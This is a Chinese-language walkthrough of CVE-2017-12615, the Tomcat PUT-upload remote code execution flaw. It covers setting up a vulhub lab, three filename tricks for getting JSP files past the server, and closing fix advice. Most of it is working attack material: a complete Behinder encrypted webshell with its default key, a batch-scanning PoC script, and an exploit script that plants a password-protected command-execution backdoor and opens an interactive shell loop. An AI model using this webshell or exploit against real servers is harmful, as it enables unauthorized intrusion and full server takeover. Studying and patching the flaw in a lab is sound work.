漏洞描述
CVE-2017-12615:遠程代碼執行漏洞
影響范圍:Apache Tomcat 7.0.0 - 7.0.79 (windows環境)
當 Tomcat 運行在 Windows 操作系統時,且啟用了 HTTP PUT 請求方法(例如,將 readonly 初始化參數由默認值設置為 false),攻擊者將有可能可通過精心構造的攻擊請求數據包向服務器上傳包含任意代碼的 JSP 文件,JSP文件中的惡意代碼將能被服務器執行。導致服務器上的數據泄露或獲取服務器權限。
環境搭建
為了方便,使用vulhub搭建漏洞環境
#進入漏洞目錄
cd vulhub/tomcat/CVE-2017-12615/
#開啟環境
docker-compose up -d
查看配置文件
#查看鏡像
docker ps
#進入鏡像環境
docker exec -ti 03de30c386ea bas
#查看配置文件conf/web.xml中readonly的設置
cat conf/web.xml | grep readonly
查看網站
http://192.168.132.140:8080/
漏洞復現
方法一
使用burpsuite抓包,修改GET為PUT上傳方式,添加文件名1.jsp/,添加shell腳本
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*該密鑰為連接密碼32位md5值的前16位,默認連接密碼rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
上傳成功
使用冰蠍訪問
方法二(適用於Windows系統)
添加文件名2.jsp%20,添加shell腳本
方法三(適用於Windows系統)
添加文件名3.jsp::$DATA,添加shell腳本
POC和EXP腳本
POC代碼
#CVE-2017-12615 POC
__author__ = '紙機'
import requests
import optparse
import os
parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
parse.add_option('-f',dest='FILE',help='target list')
options,args = parse.parse_args()
#print(options)
#驗證參數是否完整
if (not options.URL or not options.PORT) and not options.FILE:
print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port] [-f FILE]\n')
exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
filename = '/hello.jsp'
#測試數據
data = 'hello'
#提交PUT請求
#resp = requests.post(url1,headers=headers,data=data)
#驗證文件是否上傳成功
#response = requests.get(url2)
#上傳文件
def upload(url):
try:
response = requests.put(url+filename+'/',data=data)
return 1
except Exception as e:
print("[-] {0} 連接失敗".format(url))
return 0
def checking(url):
try:
#驗證文件是否上傳成功
response = requests.get(url+filename)
#print(url+filename)
if response.status_code == 200 and 'hello' in response.text:
print('[+] {0} 存在CVE-2017-12615 Tomcat 任意文件讀寫漏洞'.format(url))
else:
print('[-] {0} 不存在CVE-2017-12615 Tomcat 任意文件讀寫漏洞'.format(url))
except Exception as e:
#print(e)
print("[-] {0} 連接失敗".format(url))
if options.FILE and os.path.exists(options.FILE):
with open(options.FILE) as f:
urls = f.readlines()
#print(urls)
for url in urls:
url = str(url).replace('\n', '').replace('\r', '').strip()
if upload(url) == 1:
checking(url)
elif options.FILE and not os.path.exists(options.FILE):
print('[-] {0} 文件不存在'.format(options.FILE))
else:
#上傳鏈接
url = options.URL+':'+options.PORT
if upload(url) == 1:
checking(url)
測試
python3 CVE-2017-15715-POC.py -u http://192.168.132.144 -p8080
python3 CVE_2017_12615.py -f IP.txt
EXP代碼
#CVE-2017-12615 EXP
__author__ = '紙機'
import requests
import optparse
import time
parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
options,args = parse.parse_args()
#驗證參數是否完整
if not options.URL or not options.PORT:
print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]\n')
exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
url = options.URL+':'+options.PORT
filename = '/backdoor.jsp'
payload = filename+'?pwd=023&i='
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"}
#木馬
data = '''<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>'''
#上傳木馬文件
def upload(url):
print('[*] 目標地址:'+url)
try:
respond = requests.put(url+filename+'/',headers=headers,data = data)
#print(respond.status_code)
if respond.status_code == 201 or respond.status_code == 204:
#print('[*] 目標地址:'+url)
print('[+] 木馬上傳成功')
except Exception as e:
print('[-] 上傳失敗')
return 0
#命令執行
def attack(url,cmd):
try:
respond = requests.get(url+payload+cmd)
if respond.status_code == 200:
print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())
except Exception as e:
print('[-] 命令執行錯誤')
if upload(url) == 0:
exit()
time.sleep(0.5)
print('輸入執行命令(quit退出):')
while(1):
cmd = input('>>>')
if(cmd == 'quit'):
break
attack(url,cmd)
測試
python3 CVE-2017-12615-EXP.py -u http://192.168.132.144 -p 35654
修復建議
-
設置conf/webxml 文件的 readOnly 值為 Ture 或注釋參數
-
禁用 PUT 方法並重啟 tomcat 服務(如果禁用 PUT 方法,對於依賴PUT方法的應用,可能導致業務失效。)
-
升級到最新版本
-
使用WAF產品進行防御
參考文章
https://blog.csdn.net/weixin_45540609/article/details/119170419